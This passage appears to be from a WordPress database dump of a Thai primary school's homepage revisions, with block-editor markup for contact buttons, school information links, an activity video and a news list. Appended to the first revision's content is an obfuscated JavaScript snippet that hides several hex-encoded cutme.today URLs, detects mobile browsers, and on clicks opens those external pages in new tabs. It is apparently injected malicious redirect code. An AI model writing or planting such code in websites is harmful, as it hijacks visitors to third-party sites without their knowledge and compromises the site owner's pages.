{\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-28 09:41:56','2024-08-28 02:41:56','',19,'http://watprato.ssk.in.th/?p=236',0,'revision','',0),
(237,2,'2024-08-28 09:46:00','2024-08-28 02:46:00','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"